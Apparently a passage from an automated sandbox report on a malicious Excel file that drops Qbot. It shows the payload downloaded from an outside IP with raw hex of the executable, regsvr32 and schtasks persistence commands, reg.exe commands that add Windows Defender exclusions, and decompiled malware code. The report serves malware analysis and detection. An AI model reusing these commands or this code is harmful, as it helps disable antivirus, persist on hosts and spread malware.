Sep 28, 2021 18:00:05.315484047 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315509081 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315532923 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315556049 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315579891 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315603971 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315629005 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315654039 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315676928 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315677881 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315699100 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315701962 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315720081 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315742016 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.316319942 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.444170952 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.445362091 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.520469904 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520519972 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520545006 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520566940 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520638943 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520665884 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520689011 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520710945 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.520854950 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.520885944 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.566404104 CEST	49168	80	192.168.2.22	185.183.96.67
Sep 28, 2021 18:00:08.575367928 CEST	49168	80	192.168.2.22	185.183.96.67
Sep 28, 2021 18:00:14.581916094 CEST	49168	80	192.168.2.22	185.183.96.67
Sep 28, 2021 18:00:26.597388029 CEST	49169	80	192.168.2.22	185.183.96.67
Sep 28, 2021 18:00:29.606034994 CEST	49169	80	192.168.2.22	185.183.96.67
Sep 28, 2021 18:00:35.612565041 CEST	49169	80	192.168.2.22	185.183.96.67
Sep 28, 2021 18:00:47.659382105 CEST	49170	80	192.168.2.22	185.250.148.213
Sep 28, 2021 18:00:50.667859077 CEST	49170	80	192.168.2.22	185.250.148.213
Sep 28, 2021 18:00:56.674288034 CEST	49170	80	192.168.2.22	185.250.148.213
Sep 28, 2021 18:01:08.673470974 CEST	49171	80	192.168.2.22	185.250.148.213
Sep 28, 2021 18:01:10.524471998 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:01:10.524534941 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:01:11.682940006 CEST	49171	80	192.168.2.22	185.250.148.213
Sep 28, 2021 18:01:17.689526081 CEST	49171	80	192.168.2.22	185.250.148.213
Sep 28, 2021 18:02:00.812318087 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:02:00.997560024 CEST	80	49167	190.14.37.178	192.168.2.22

HTTP Request Dependency Graph

190.14.37.178

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	190.14.37.178	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 18:00:01.173538923 CEST	0	OUT	GET /44467.7495993056.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.14.37.178 Connection: Keep-Alive
Sep 28, 2021 18:00:02.207995892 CEST	1	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 16:00:02 GMT Content-Type: application/octet-stream Content-Length: 387072 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44467.7495993056.dat" Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p\| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP
Sep 28, 2021 18:00:02.219105959 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 55 89 e5 83 c4 f8 e8 2e 36 00 00 3b d8 0f 84 46 02 00 00 60 03 fb 41 03 c8 50 51 68 25 01 00 00 83 bb fe 53 43 00 00 75 3a 68 00 20 00 00 68 0b 01 00 00 6a 77 6a 3b ff b3 Data Ascii: jU.6;F`APQh%SCu:h hjwj;YC~SCPCDU+,1SC1SC]^TCTYCuXDu1TYCuTChYCIXCu!YCPlDR+1IXCIXCZjKZCBSCu
Sep 28, 2021 18:00:02.219146013 CEST	4	IN	Data Raw: 43 00 68 f8 00 00 00 68 d7 01 00 00 ff b3 22 54 43 00 ff b3 af 51 43 00 6a 01 6a 00 ff 93 a0 10 44 00 89 75 f8 31 f6 09 c6 89 b3 0c 59 43 00 8b 75 f8 8d 83 d2 54 43 00 50 6a 40 83 bb 68 59 43 00 00 75 1a ff 93 58 10 44 00 51 2b 0c e4 09 c1 83 a3 Data Ascii: Chh"TCQCjjDu1YCuTCPj@hYCuXDQ+hYChYCYbTCTCPPCPDDj1YCYPC<D;tifSCu!WCPhDW1fSC1fSC_NWCRCHRCu%XCPdDU3UHRC
Sep 28, 2021 18:00:02.219171047 CEST	6	IN	Data Raw: 83 bb 5e 51 43 00 00 75 36 50 51 ff b3 be 53 43 00 ff 93 a4 10 44 00 6a 00 89 14 e4 31 d2 09 c2 89 93 5e 51 43 00 5a 81 e1 00 00 00 00 0b 0c e4 83 c4 04 81 e0 00 00 00 00 8f 45 f8 33 45 f8 03 4d 0c 53 89 cb 33 5d 08 89 d9 5b 83 bb ce 54 43 00 00 Data Ascii: ^QCu6PQSCDj1^QCZE3EMS3][TCuf,UCu1PQlXCPdDj,)1,UC]EEPQWCPlDPEuTC)3);Mv?QCu3PQSCPdDj1QCY
Sep 28, 2021 18:00:02.219194889 CEST	7	IN	Data Raw: bb 13 53 43 00 00 75 27 50 ff 93 60 10 44 00 89 75 e4 83 e6 00 31 c6 83 a3 13 53 43 00 00 09 b3 13 53 43 00 8b 75 e4 31 c0 0b 04 e4 83 ec fc 89 7d e4 29 ff 09 c7 89 bb a8 50 43 00 8b 7d e4 83 bb 84 58 43 00 00 75 3b 68 00 10 00 00 6a 4b ff b3 49 Data Ascii: SCu'P`Du1SCSCu1})PC}XCu;hjKIUC<PCTCUCUCD}1XC}}UCu$pYCpDM+MUCUCMUVCuAXDM1UVC1UVCMTCujj
Sep 28, 2021 18:00:02.219217062 CEST	8	IN	Data Raw: 44 00 57 2b 3c e4 09 c7 83 a3 3f 52 43 00 00 09 bb 3f 52 43 00 5f 31 c0 0b 04 e4 83 c4 04 56 33 34 e4 09 c6 83 a3 b0 52 43 00 00 09 b3 b0 52 43 00 5e 83 bb b3 51 43 00 00 75 26 ff b3 a9 56 43 00 ff b3 78 59 43 00 ff 93 a8 10 44 00 51 83 e1 00 09 Data Ascii: DW+<?RC?RC_1V34RCRC^QCu&VCxYCDQQC1QCYEU1SCu7QRRCPhD}+}SCSC}1)RQV34u1^LRCu'P\DULRC1LRCU)EESC
Sep 28, 2021 18:00:02.219238043 CEST	10	IN	Data Raw: 8d 83 d2 54 43 00 50 6a 02 52 83 bb 10 50 43 00 00 75 1e ff 93 58 10 44 00 89 75 f8 83 e6 00 31 c6 83 a3 10 50 43 00 00 31 b3 10 50 43 00 8b 75 f8 57 ff 93 3c 10 44 00 81 e7 00 00 00 00 8f 45 f8 03 7d f8 83 bb c6 54 43 00 00 75 1e ff 93 58 10 44 Data Ascii: TCPjRPCuXDu1PC1PCuW<DE}TCuXDu3u1TC1TCuU]WQMY]3_]QPCP]XCPDDW1RCRC_wPCDYCu!ZCPTDu)
Sep 28, 2021 18:00:02.219259977 CEST	11	IN	Data Raw: 84 00 00 00 83 bb 68 58 43 00 00 75 36 68 00 10 00 00 68 e2 00 00 00 68 ef 01 00 00 ff b3 90 50 43 00 ff b3 84 52 43 00 6a 01 ff b3 0d 5a 43 00 ff 93 a0 10 44 00 50 8f 45 f0 ff 75 f0 8f 83 68 58 43 00 8d 83 69 55 43 00 50 ff 93 68 10 44 00 89 75 Data Ascii: hXCu6hhhPCRCjZCDPEuhXCiUCPhDu11QCuTCP6QCPDDU3,zSC1zSC]XYCu!4UCPdDUXYC1XYC]}?3RCu jD}+}13RC13RC}
Sep 28, 2021 18:00:02.219281912 CEST	12	IN	Data Raw: 14 00 00 00 89 cf 59 83 3f 00 0f 85 74 fb ff ff 83 bb 26 54 43 00 00 75 1c 6a 00 ff 93 70 10 44 00 56 33 34 e4 09 c6 83 a3 26 54 43 00 00 31 b3 26 54 43 00 5e 83 7f 10 00 0f 85 45 fb ff ff 56 89 c6 31 c6 89 f0 5e 29 f6 33 34 e4 83 ec fc 29 ff 0b Data Ascii: Y?t&TCujpDV34&TC1&TC^EV1^)34)<UVWPCEE3E3EERZu9<S33_4[u)E])]]GU]U1UPXu]3]_]EE
Sep 28, 2021 18:00:02.220329046 CEST	14	IN	Data Raw: 10 44 00 50 8f 45 f8 ff 75 f8 8f 83 5a 54 43 00 ff 76 08 83 bb 98 58 43 00 00 75 25 8d 83 90 52 43 00 50 ff 93 6c 10 44 00 89 7d f8 83 e7 00 09 c7 83 a3 98 58 43 00 00 31 bb 98 58 43 00 8b 7d f8 57 83 bb d8 58 43 00 00 75 18 6a 00 ff 93 70 10 44 Data Ascii: DPEuZTCvXCu%RCPlD}XC1XC}WXCujpDj11XCZVTCu}UCujpDWUC1UC_jDYCu:PZCQZCeVCjL@YCjjDPEuYC1PEuVTCRCE
Sep 28, 2021 18:00:02.409956932 CEST	15	IN	Data Raw: 0f 86 4d 02 00 00 83 bb b6 54 43 00 00 75 43 68 00 04 00 00 ff b3 98 52 43 00 ff b3 7e 57 43 00 6a 0d ff b3 a1 55 43 00 ff b3 12 54 43 00 ff b3 88 50 43 00 ff 93 a0 10 44 00 89 7d f8 2b 7d f8 09 c7 83 a3 b6 54 43 00 00 31 bb b6 54 43 00 8b 7d f8 Data Ascii: MTCuChRC~WCjUCTCPCD}+}TC1TC}uEu_Wj4)w^PCu&QUCPhDj,11PC])]3_1]YVCu2PQ`D}1YVC1YVC}E3MEEQQu3u1

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 508 Parent PID: 596

General

Start time:	17:59:20
Start date:	28/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fe10000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 2784 Parent PID: 508

General

Start time:	18:00:54
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd.red
Imagebase:	0xffeb0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1176 Parent PID: 2784

General

Start time:	18:00:55
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-silent ..\Drezd.red
Imagebase:	0x400000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 1016 Parent PID: 1176

General

Start time:	18:00:56
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x410000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1832 Parent PID: 508

General

Start time:	18:01:00
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd1.red
Imagebase:	0xffeb0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2556 Parent PID: 1016

General

Start time:	18:01:00
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15
Imagebase:	0x610000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2520 Parent PID: 508

General

Start time:	18:01:00
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd2.red
Imagebase:	0xffeb0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3020 Parent PID: 1672

General

Start time:	18:01:02
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Drezd.red'
Imagebase:	0xff2a0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2936 Parent PID: 3020

General

Start time:	18:01:03
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Drezd.red'
Imagebase:	0xa90000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3016 Parent PID: 2936

General

Start time:	18:01:05
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x410000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 840 Parent PID: 3016

General

Start time:	18:01:07
Start date:	28/09/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'
Imagebase:	0xff260000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 2068 Parent PID: 3016

General

Start time:	18:01:09
Start date:	28/09/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0'
Imagebase:	0xff620000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 916 Parent PID: 1672

General

Start time:	18:03:00
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Drezd.red'
Imagebase:	0xffdc0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2652 Parent PID: 916

General

Start time:	18:03:00
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Drezd.red'
Imagebase:	0xd10000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 1176 Parent PID: 2784 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	6.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x2e5faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x2e5fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x2e5faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x2e5faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x2e5faa0
				_t61 = _t222 + 0x1434; // 0x1434
